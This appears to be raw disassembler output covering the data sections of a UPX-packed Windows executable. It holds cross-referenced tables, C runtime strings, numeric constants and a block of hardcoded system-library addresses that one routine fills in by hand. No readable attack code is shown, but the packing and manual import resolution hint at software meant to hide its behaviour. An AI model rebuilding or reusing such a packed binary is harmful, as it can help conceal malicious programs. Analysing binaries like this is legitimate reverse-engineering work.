; sub_41EABA+20�w ...
dword_43C9D4 dd 1E0h ; DATA XREF: sub_41B202+185�r
; sub_41B513:loc_41B54F�r ...
off_43C9D8 dd offset word_43C9E2 ; DATA XREF: sub_41B6EE+23�r
; sub_41B6EE:loc_41B74F�r ...
off_43C9DC dd offset word_43C9E2 ; DATA XREF: sub_426BC1+18�r
db 2 dup(0)
word_43C9E2 dw 20h ; DATA XREF: sub_424D47+18�r
; UPX0:off_43C9D8�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_43CBE4 dd 1 ; DATA XREF: sub_41B6EE:loc_41B6F6�r
; sub_41B6EE:loc_41B73A�r ...
byte_43CBE8 db 2Eh ; DATA XREF: sub_420510:loc_420804�r
; sub_420510+311�r ...
align 4
dd 1
off_43CBF0 dd offset aNull_0 ; DATA XREF: sub_41F69F:loc_41FA03�r
; sub_41F69F+457�r
; "(null)"
off_43CBF4 dd offset aNull ; DATA XREF: sub_41F69F+259�r
; "(null)"
byte_43CBF8 db 1 ; DATA XREF: sub_41FEA9+E1�r
db 2, 4, 8
align 10h
dword_43CC00 dd 3A4h ; DATA XREF: sub_41FEA9+2F�o
dword_43CC04 dd 82798260h, 21h, 0 ; DATA XREF: sub_41FEA9+11D�r
dword_43CC10 dd 0DFA6h ; DATA XREF: sub_41FEA9+C0�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_43CCF0 dd 1 ; DATA XREF: sub_41FEA9+3C�o
; sub_4203DF+C�o
dword_43CCF4 dd 16h ; DATA XREF: sub_4203DF:loc_420414�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_43CE58 dd 0D2D0920h, 5Dh ; DATA XREF: sub_4203DF+19�o
; sub_420510:loc_420A77�o
dword_43CE60 dd 5Dh, 0 ; DATA XREF: sub_420510:loc_420967�o
dword_43CE68 dd 14h ; DATA XREF: sub_421624+2�o
off_43CE6C dd offset aExp ; DATA XREF: sub_421624:loc_421641�r
; "exp"
dd 1Dh, 427870h, 1Ah, 42C964h, 1Bh, 427868h, 1Fh, 427860h
dd 13h, 427858h, 21h, 427850h, 0Eh, 427848h, 0Dh, 427840h
dd 0Fh, 427838h, 10h, 427830h, 5, 427828h, 1Eh, 427824h
dd 12h, 427820h, 20h, 42781Ch, 0Ch, 427814h, 0Bh, 42780Ch
dd 15h, 427804h, 1Ch, 4277FCh, 19h, 4277F4h, 11h, 4277ECh
dd 18h, 4277E4h, 16h, 4277DCh, 17h, 4277D4h, 22h, 4277D0h
dd 23h, 4277CCh, 24h, 4277C8h
dbl_43CF40 dq 1.797693134862316e308 ; DATA XREF: sub_42135F+B7�r
; sub_42135F:loc_421446�r ...
dd 0
dd 0FFF80000h
dbl_43CF50 dq 1.797693134862316e308 ; DATA XREF: sub_42135F+92�r
; sub_42135F:loc_42141E�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_43CF68 dt 2.3562723457267347066e313 ; DATA XREF: sub_42180C+D�r
; sub_42180C+1F�r
align 4
tbyte_43CF74 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_42180C+31�r
align 10h
off_43CF80 dd offset sub_421CA0 ; DATA XREF: sub_41C760+F�w
; sub_41F69F+3AA�r
off_43CF84 dd offset sub_421935 ; DATA XREF: sub_41C760+5�w
; sub_41F69F+3E2�r
off_43CF88 dd offset sub_42199B ; DATA XREF: sub_41C760+14�w
; sub_420510+430�r
off_43CF8C dd offset sub_4218DB ; DATA XREF: sub_41C760+1E�w
; sub_41F69F+3CB�r
off_43CF90 dd offset sub_421983 ; DATA XREF: sub_41C760+28�w
off_43CF94 dd offset sub_421CA0 ; DATA XREF: sub_41C760+32�w
dd offset sub_42470C
align 10h
dd offset sub_42255C
off_43CFA4 dd offset sub_42255C ; DATA XREF: sub_4225B2+29�r
dword_43CFA8 dd 0C0000005h ; DATA XREF: sub_422E2F+A�r
; sub_422E2F+11�o ...
dword_43CFAC dd 0Bh ; DATA XREF: sub_425A82+A�r
dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_43D020 dd 3 ; DATA XREF: sub_422CEE+58�r
; sub_425955+C8�r
dword_43D024 dd 7 ; DATA XREF: sub_422CEE+5E�r
; sub_425955+CD�r
dword_43D028 dd 0Ah ; DATA XREF: sub_422E2F+4�r
; sub_425A82+4�r
dword_43D02C dd 8Ch ; DATA XREF: sub_422CEE+82�r
; sub_422CEE+8F�w ...
dword_43D030 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_41F043:loc_41F0C4�o
; sub_41F58A:loc_41F647�o
dword_43D038 dd 2 ; DATA XREF: sub_4235C9+E�o
; sub_4235C9+28�r
off_43D03C dd offset aR6002FloatingP ; DATA XREF: sub_4235C9+FC�r
; sub_4235C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 427B8Ch, 9, 427B60h, 0Ah, 427B3Ch, 10h, 427B10h
dd 11h, 427AE0h, 12h, 427ABCh, 13h, 427A90h, 18h, 427A58h
dd 19h, 427A30h, 1Ah, 4279F8h, 1Bh, 4279C0h, 1Ch, 427998h
dd 78h, 427988h, 79h, 427978h, 7Ah, 427968h, 0FCh, 433F14h
dd 0FFh, 427958h
off_43D0C8 dd offset dword_4DBC80 ; DATA XREF: sub_4235C9+1B�o
; sub_423936+55�o
align 10h
dd offset dword_4DBC80
dd 101h
dword_43D0D8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423936+72�o
dd 1000h, 0
dword_43D0E8 dd 3 dup(0) ; DATA XREF: sub_41F58A+50�o
; sub_420446+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_43D108 dd 3 dup(0) ; DATA XREF: sub_41F58A+58�o
; sub_420446:loc_420464�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_43D138 dd 84h dup(0) ; DATA XREF: sub_423936+9B�o
dword_43D348 dd 2 dup(0) ; DATA XREF: sub_423936+69�o
dword_43D350 dd 2694h ; DATA XREF: sub_420FC1+3�r
; sub_421014+46�r
align 8
dword_43D358 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_4244EC�o
dword_43D370 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_424502�o
dword_43D388 dd 7080h ; DATA XREF: sub_422669+76�r
; sub_4247EC+5E�w ...
dword_43D38C dd 1 ; DATA XREF: sub_422669+98�r
; sub_4247EC+8B�w ...
dword_43D390 dd 0FFFFF1F0h ; DATA XREF: sub_422669:loc_42271B�r
; sub_4247EC+94�w ...
dword_43D394 dd 545350h, 0Fh dup(0) ; DATA XREF: UPX0:off_43D414�o
dword_43D3D4 dd 544450h, 0Fh dup(0) ; DATA XREF: UPX0:off_43D418�o
off_43D414 dd offset dword_43D394 ; DATA XREF: sub_4247EC+BA�r
; sub_4247EC+D9�r ...
off_43D418 dd offset dword_43D3D4 ; DATA XREF: sub_4247EC+F4�r
; sub_4247EC+11B�r ...
align 10h
dword_43D420 dd 0FFFFFFFFh ; DATA XREF: sub_4247EC+1D�w
; sub_424A4A+1E�r ...
dword_43D424 dd 0 ; DATA XREF: sub_424A4A:loc_424B7E�r
; sub_424BF6+BF�w
dword_43D428 dd 0 ; DATA XREF: sub_424A4A+192�r
; sub_424BF6+E0�w
align 10h
dword_43D430 dd 0FFFFFFFFh ; DATA XREF: sub_4247EC+17�w
; sub_424A4A+26�r ...
dword_43D434 dd 0 ; DATA XREF: sub_424A4A+13A�r
; sub_424BF6+EA�w ...
dword_43D438 dd 0 ; DATA XREF: sub_424A4A+1A1�r
; sub_424BF6+23�r ...
dword_43D43C dd 0FFFFFFFFh ; DATA XREF: sub_424BF6+84�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_43D46C dd 16Dh ; DATA XREF: sub_422669+2A�r
; sub_424BF6+2E�r ...
dword_43D470 dd 0FFFFFFFFh ; DATA XREF: sub_424BF6:loc_424C82�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_43D4A8 dd 2 dup(0) ; DATA XREF: sub_425DDA+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_43D608 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_425DDA+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_43D764 dd offset off_427D60 ; DATA XREF: UPX0:00427F3C�o
; UPX0:00428028�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_43D77C dd offset off_427D60 ; DATA XREF: UPX0:off_427DF0�o
; UPX0:00427E30�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_43D79C dd offset off_427D60 ; DATA XREF: UPX0:off_427E38�o
; UPX0:00427E7C�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_43D7BC dd offset off_427D60 ; DATA XREF: UPX0:off_427E84�o
; UPX0:00427EC8�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
off_43D7E0 dd offset off_427D60 ; DATA XREF: UPX0:off_427ED0�o
; UPX0:00427F0C�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_42470C
align 10h
dword_43D800 dd 2 dup(0) ; DATA XREF: sub_40111D+C8�o
byte_43D808 db 0 ; DATA XREF: sub_40111D+62�o
; sub_401221+24D�o ...
align 10h
dword_43D810 dd 0 ; DATA XREF: sub_401221+38F�o
; sub_401ACD+B08�o ...
dd 5 dup(0)
dword_43D828 dd 0 ; DATA XREF: sub_401ACD+B64�r
; sub_4150B5+60�r
dd 2D9h dup(0)
dword_43E390 dd 0 ; DATA XREF: sub_401ACD+5E63�r
; sub_401ACD+5F40�r ...
dd 7Fh dup(0)
dword_43E590 dd 0 ; DATA XREF: sub_40B0F7+41�w
; sub_40B232+40�w ...
dword_43E594 dd 0 ; DATA XREF: sub_40B0F7+47�w
; sub_40B232+46�w ...
dword_43E598 dd 0 ; DATA XREF: sub_40B0F7+52�w
; sub_40B232+3A�r ...
dword_43E59C dd 0 ; DATA XREF: sub_40111D+C�r
; sub_4017ED+B9�w ...
dword_43E5A0 dd 0 ; DATA XREF: sub_40B232+75�r
; sub_40B413+2A�w ...
dword_43E5A4 dd 0 ; DATA XREF: sub_401221+3DE�w
; sub_401221+456�w ...
byte_43E5A8 db 0 ; DATA XREF: sub_4017ED+91�o
; sub_401ACD+5DA8�r ...
align 4
dd 1C69h dup(0)
dword_445750 dd 473Ch dup(0) ; DATA XREF: UPX0:off_433E54�o
db 0
byte_457441 db 3 dup(0) ; DATA XREF: UPX0:off_438BAC�o
dd 17780h dup(0)
db 0
byte_4B5245 db 3 dup(0) ; DATA XREF: UPX0:off_438A18�o
dd 3F6Eh dup(0)
UPX0 ends
; Section 2. (virtual address 000C5000)
; Virtual size : 0001B000 ( 110592.)
; Section size in file : 0001B000 ( 110592.)
; Offset to raw data for section: 000C5000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 4C5000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_4C5000 dd 18E4h dup(0) ; DATA XREF: UPX1:004DF241�o
dword_4CB390 dd 0C515h ; DATA XREF: sub_40111D+FD�w
; sub_40B0F7+13�o ...
dword_4CB394 dd 1Bh ; DATA XREF: sub_401221+3D�w
; sub_401ACD:loc_4044D8�r ...
dword_4CB398 dd 0 ; DATA XREF: sub_401221:loc_4016FF�o
dword_4CB39C dd 20h dup(0) ; DATA XREF: sub_401221+495�o
; sub_401221+52F�o ...
dword_4CB41C dd 10h dup(0) ; DATA XREF: sub_401221+4AB�o
dword_4CB45C dd 24h dup(0) ; DATA XREF: sub_401221+4C2�o
dword_4CB4EC dd 0 ; DATA XREF: sub_401221+4B6�w
; sub_401221+546�w ...
dword_4CB4F0 dd 0 ; DATA XREF: sub_401221+4D5�w
align 10h
byte_4CB500 db 0 ; DATA XREF: sub_401955+28�r
; sub_401955+30�o
align 4
dword_4CB504 dd 0 ; DATA XREF: sub_401221+4E3�w
; sub_401221+4FA�r ...
dword_4CB508 dd 0 ; DATA XREF: sub_401221+49A�w
; sub_401ACD+8BE�r
dword_4CB50C dd 0 ; DATA XREF: sub_401ACD+7DC0�o
; sub_40C9A5+13�o ...
dword_4CB510 dd 77C72C6Bh ; DATA XREF: sub_409B13+4A7�w
; sub_409B13+4EB�r ...
dword_4CB514 dd 77EBA994h ; DATA XREF: sub_409B13+65�w
; sub_4196BD+166�r
dword_4CB518 dd 7622A3F4h ; DATA XREF: sub_409B13+80B�w
; sub_409B13+880�r ...
dword_4CB51C dd 71C45229h ; DATA XREF: sub_409B13+9D8�w
; sub_409B13+A43�r ...
dword_4CB520 dd 71C24870h ; DATA XREF: sub_409B13+98A�w
; sub_409B13+A13�r ...
dword_4CB524 dd 77C71BB0h ; DATA XREF: sub_409B13+48D�w
; sub_409B13+4DB�r ...
dword_4CB528 dd 77D4808Bh ; DATA XREF: sub_409B13+213�w
; sub_409B13+234�r ...
dword_4CB52C dd 71C4502Ch ; DATA XREF: sub_409B13+9CB�w
; sub_409B13+A3B�r ...
dword_4CB530 dd 77DE801Bh ; DATA XREF: sub_409B13+372�w
; sub_409B13+3C7�r ...
dword_4CB534 dd 77DDACABh ; DATA XREF: sub_409B13+40F�w
; sub_41AA43+11E�r
dword_4CB538 dd 77DE8075h ; DATA XREF: sub_409B13+37F�w
; sub_409B13+3CF�r ...
dword_4CB53C dd 77DD7496h ; DATA XREF: sub_409B13+3C0�w
; sub_418C8F+AD�r
dword_4CB540 dd 71AB1B7Bh ; DATA XREF: sub_409B13+55A�w
; sub_40F0D6+115�r ...
dword_4CB544 dd 77E686CCh ; DATA XREF: sub_409B13+72�w
; sub_409B13+D2�r ...
dword_4CB548 dd 71C2498Bh ; DATA XREF: sub_409B13+97D�w
; sub_409B13+A06�r ...
dword_4CB54C dd 77DDAB2Fh ; DATA XREF: sub_409B13+3A6�w
; sub_409B13+3E7�r ...
dword_4CB550 dd 7620E8C3h ; DATA XREF: sub_409B13+859�w
; sub_409B13+8AC�r ...
dword_4CB554 dd 77DD23D7h ; DATA XREF: sub_409B13+2A5�w
; sub_409B13+2F0�r ...
dword_4CB558 dd 76214750h ; DATA XREF: sub_409B13+84C�w
; sub_409B13+8A4�r ...
dword_4CB55C dd 77E6D75Bh ; DATA XREF: sub_409B13+B3�w
dword_4CB560 dd 7620BD61h ; DATA XREF: sub_409B13+866�w
; sub_409B13+8B4�r ...
dword_4CB564 dd 71AB60C9h ; DATA XREF: sub_409B13+54D�w
; sub_409B13+6D0�r ...
dword_4CB568 dd 77EBA6E9h ; DATA XREF: sub_409B13+58�w
; sub_409B13+CA�r ...
dword_4CB56C dd 76D62A58h ; DATA XREF: sub_409B13+934�w
; sub_413285+11A�r
dword_4CB570 dd 76F36EAAh ; DATA XREF: sub_401ACD:loc_403F26�r
; sub_409B13+A95�w ...
dword_4CB574 dd 77E802FCh ; DATA XREF: sub_409B13+A6�w
; sub_409B13+F2�r
dword_4CB578 dd 77C75455h ; DATA XREF: sub_409B13+480�w
; sub_409B13+4D3�r ...
dword_4CB57C dd 71AB12A7h ; DATA XREF: sub_409B13+5F6�w
; sub_40BFA4+20�r ...
dword_4CB580 dd 71C574FAh ; DATA XREF: sub_409B13+9BE�w
; sub_409B13+A33�r
dword_4CB584 dd 71AB1746h ; DATA XREF: sub_409B13+5E9�w
; sub_409B13+754�r ...
dword_4CB588 dd 71C21CA3h ; DATA XREF: sub_409B13+A0C�w
dword_4CB58C dd 71B28D0Dh ; DATA XREF: sub_409B13+B50�w
dword_4CB590 dd 762211EFh ; DATA XREF: sub_409B13+7FE�w
; sub_409B13+86D�r ...
dword_4CB594 dd 77D902E3h ; DATA XREF: sub_409B13+1B3�w
; sub_40B2F2+3D�o ...
dword_4CB598 dd 71C2FA86h ; DATA XREF: sub_409B13+997�w
; sub_409B13+A1B�r ...
dword_4CB59C dd 77DE1291h ; DATA XREF: sub_409B13+38C�w
; sub_409B13+3D7�r ...
dword_4CB5A0 dd 77E2C1B3h ; DATA XREF: sub_409B13+399�w
; sub_409B13+3DF�r ...
dword_4CB5A4 dd 73B81E3Bh ; DATA XREF: sub_409B13+C85�w
; sub_409B13+C8C�r ...
dword_4CB5A8 dd 71ABF628h ; DATA XREF: sub_409B13+6AC�w
; sub_4107C0+D0�r
dword_4CB5AC dd 71AB1836h ; DATA XREF: sub_40111D+1D�r
; sub_40111D+23�r ...
dword_4CB5B0 dd 77C72889h ; DATA XREF: sub_409B13+4B4�w
; sub_4153BD+207�r
dword_4CB5B4 dd 71C453F8h ; DATA XREF: sub_409B13+9E5�w
; sub_409B13+A4B�r ...
dword_4CB5B8 dd 77DD5C55h ; DATA XREF: sub_401000+51�r
; sub_409B13+2B2�w ...
dword_4CB5BC dd 77E96645h ; DATA XREF: sub_409B13+7F�w
; sub_409B13+DA�r ...
dword_4CB5C0 dd 77428B97h ; DATA XREF: sub_401ACD+5912�r
; sub_401ACD+79CF�r ...
dword_4CB5C4 dd 71AB41DAh ; DATA XREF: sub_401221+8C�r
; sub_401ACD+5118�r ...
dword_4CB5C8 dd 762059A3h ; DATA XREF: sub_409B13+825�w
; sub_409B13+890�r ...
dword_4CB5CC dd 71C4A1B4h ; DATA XREF: sub_409B13+9A4�w
; sub_409B13+A23�r
dword_4CB5D0 dd 1F7CD214h ; DATA XREF: sub_409B13+C0E�w
; sub_409B13+C3F�r
dword_4CB5D4 dd 77E09134h ; DATA XREF: sub_409B13+2CC�w
; sub_4184E2+47�r
dword_4CB5D8 dd 77D4456Bh ; DATA XREF: sub_409B13+22D�w
; sub_411CF5+40�r ...
dword_4CB5DC dd 76D629BBh ; DATA XREF: sub_409B13+91A�w
; sub_409B13+92E�r ...
dword_4CB5E0 dd 1F7B9D96h ; DATA XREF: sub_409B13+C28�w
dword_4CB5E4 dd 77E09070h ; DATA XREF: sub_409B13+2D9�w
; sub_4184E2+4F�r
dword_4CB5E8 dd 71AB1740h ; DATA XREF: sub_409B13+574�w
; sub_409B13+6E8�r ...
dword_4CB5EC dd 7620AFB6h ; DATA XREF: sub_409B13+83F�w
; sub_409B13+873�r
dword_4CB5F0 dd 77D5C13Ah ; DATA XREF: sub_409B13+220�w
; sub_409B13+23C�r ...
dword_4CB5F4 dd 77D45B19h ; DATA XREF: sub_409B13+172�w
; sub_409B13+1C2�r ...
dword_4CB5F8 dd 71AB157Eh ; DATA XREF: sub_401ACD+1E31�r
; sub_401ACD+5AC8�r ...
dword_4CB5FC dd 71AB3E5Dh ; DATA XREF: sub_4017ED+C4�r
; sub_401ACD+51A2�r ...
dword_4CB600 dd 71AB14DCh ; DATA XREF: sub_409B13+567�w
; sub_409B13+6DC�r ...
dword_4CB604 dd 0CC0004h ; DATA XREF: sub_409B13+8DB�w
; sub_409B13:loc_40A40C�w ...
dword_4CB608 dd 77DD590Bh ; DATA XREF: sub_401000+26�r
; sub_409B13+28B�w ...
dword_4CB60C dd 71ABD755h ; DATA XREF: sub_401ACD+795A�r
; sub_409B13+69F�w ...
dword_4CB610 dd 77DF7311h ; DATA XREF: sub_409B13+32D�w
; sub_409B13+341�r ...
dword_4CB614 dd 77DDA2AFh ; DATA XREF: sub_409B13+3B3�w
; sub_409B13+3EF�r ...
dword_4CB618 dd 1F7CD927h ; DATA XREF: sub_409B13+C01�w
; sub_409B13+C37�r
dword_4CB61C dd 76206853h ; DATA XREF: sub_409B13+818�w
; sub_409B13+888�r ...
dword_4CB620 dd 77D4932Ch ; DATA XREF: sub_409B13+206�w
; sub_409B13+227�r ...
dword_4CB624 dd 77D5E310h ; DATA XREF: sub_409B13+18C�w
; sub_409B13+1D2�r ...
dword_4CB628 dd 76206B7Fh ; DATA XREF: sub_409B13+832�w
; sub_409B13+898�r ...
dword_4CB62C dd 71AB1444h ; DATA XREF: sub_409B13+624�w
; sub_409B13+774�r ...
dword_4CB630 dd 77DD189Ah ; DATA XREF: sub_401000+5A�r
; sub_409B13+2BF�w ...
dword_4CB634 dd 71AB3F8Dh ; DATA XREF: sub_409B13+66B�w
; sub_409B13+79C�r ...
dword_4CB638 dd 77DD5D20h ; DATA XREF: sub_409B13+320�w
; sub_409B13+334�r ...
dword_4CB63C dd 71AB1890h ; DATA XREF: sub_409B13+644�w
; sub_409B13+784�r ...
dword_4CB640 dd 77C76B34h ; DATA XREF: sub_409B13+44C�w
; sub_409B13+4AE�r ...
dword_4CB644 dd 77D5E38Ch ; DATA XREF: sub_409B13+199�w
; sub_409B13+1DA�r ...
dword_4CB648 dd 77DDA20Bh ; DATA XREF: sub_409B13+365�w
; sub_409B13+3BA�r ...
dword_4CB64C dd 76F36EEBh ; DATA XREF: sub_409B13+AA2�w
dword_4CB650 dd 71AB12A7h ; DATA XREF: sub_409B13+5DC�w
; sub_409B13+748�r ...
dword_4CB654 dd 71AB1746h ; DATA XREF: sub_4017ED+3E�r
; sub_401ACD+5154�r ...
dword_4CB658 dd 77EBA595h ; DATA XREF: sub_409B13+4B�w
; sub_409B13+C2�r ...
dword_4CB65C dd 77C7531Dh ; DATA XREF: sub_409B13+473�w
; sub_409B13+4CB�r ...
dword_4CB660 dd 77D4BDCAh ; DATA XREF: sub_409B13+165�w
; sub_409B13+1BA�r ...
dword_4CB664 dd 71C3516Ah ; DATA XREF: sub_409B13+9FF�w
; sub_409B13+A5B�r ...
dword_4CB668 dd 71AB32CAh ; DATA XREF: sub_409B13+685�w
; sub_409B13+7AC�r ...
dword_4CB66C dd 71AB5690h ; DATA XREF: sub_401955+D1�r
; sub_401ACD+51B7�r ...
dword_4CB670 dd 1F7CB8F8h ; DATA XREF: sub_409B13+C1B�w
; sub_409B13+C47�r
dword_4CB674 dd 77EBB1E7h ; DATA XREF: sub_409B13+3E�w
; sub_409B13+BA�r ...
dword_4CB678 dd 77DD59F0h ; DATA XREF: sub_401000+45�r
; sub_409B13+298�w ...
dword_4CB67C dd 71AB5DE2h ; DATA XREF: sub_409B13+651�w
; sub_409B13+78C�r ...
dword_4CB680 dd 71AB3ECEh ; DATA XREF: sub_409B13+637�w
; sub_409B13+77C�r ...
dword_4CB684 dd 73B81B0Fh ; DATA XREF: sub_401ACD+73BA�r
; sub_409B13+C92�w
dword_4CB688 dd 76204E4Dh ; DATA XREF: sub_409B13+879�w
; sub_4163FA+4DC�r ...
dword_4CB68C dd 0 ; DATA XREF: sub_409B13+112�w
dword_4CB690 dd 1F7D886Ah ; DATA XREF: sub_409B13+BE7�w
; sub_409B13+C22�r
dword_4CB694 dd 71AB12F8h ; DATA XREF: sub_401ACD+2FE5�r
; sub_401ACD+5F99�r ...
dword_4CB698 dd 77C76551h ; DATA XREF: sub_409B13+459�w
; sub_409B13+4BB�r ...
dword_4CB69C dd 77C729E2h ; DATA XREF: sub_409B13+49A�w
; sub_409B13+4E3�r ...
dword_4CB6A0 dd 77C7212Fh ; DATA XREF: sub_409B13+466�w
; sub_409B13+4C3�r ...
dword_4CB6A4 dd 71AB1AF4h ; DATA XREF: sub_401955+89�r
; sub_401ACD+51D4�r ...
dword_4CB6A8 dd 77D5E303h ; DATA XREF: sub_409B13+1A6�w
; sub_409B13+1E2�r ...
dword_4CB6AC dd 71C4576Ch ; DATA XREF: sub_409B13+9F2�w
; sub_409B13+A53�r ...
dword_4CB6B0 dd 77D4702Fh ; DATA XREF: sub_409B13+158�w
; sub_409B13+1AD�r ...
dword_4CB6B4 dd 77E6C0E3h ; DATA XREF: sub_409B13+8C�w
; sub_409B13+E2�r ...
dword_4CB6B8 dd 71AB1ED3h ; DATA XREF: sub_409B13+610�w
; sub_409B13+764�r ...
dword_4CB6BC dd 71B2A381h ; DATA XREF: sub_409B13+B43�w
; sub_409B13+B5F�r
dword_4CB6C0 dd 77DDA595h ; DATA XREF: sub_409B13+33A�w
; sub_419652+55�r
dword_4CB6C4 dd 77DD22EAh ; DATA XREF: sub_409B13+27E�w
; sub_409B13+2D3�r ...
dword_4CB6C8 dd 773F97B0h ; DATA XREF: sub_409B13+BAA�w
dword_4CB6CC dd 76D67A29h ; DATA XREF: sub_409B13+AEC�w
; sub_40AB32+CE�r
dword_4CB6D0 dd 76D674FAh ; DATA XREF: sub_409B13+ADF�w
; sub_409B13+AE6�r ...
dword_4CB6D4 dd 71AB3C22h ; DATA XREF: sub_4017ED+A6�r
; sub_401ACD+5133�r ...
dword_4CB6D8 dd 71AB2BBFh ; DATA XREF: sub_401ACD+5125�r
; sub_401ACD+7981�r ...
dword_4CB6DC dd 1F7BA3A9h ; DATA XREF: sub_409B13+BF4�w
; sub_409B13+C2F�r
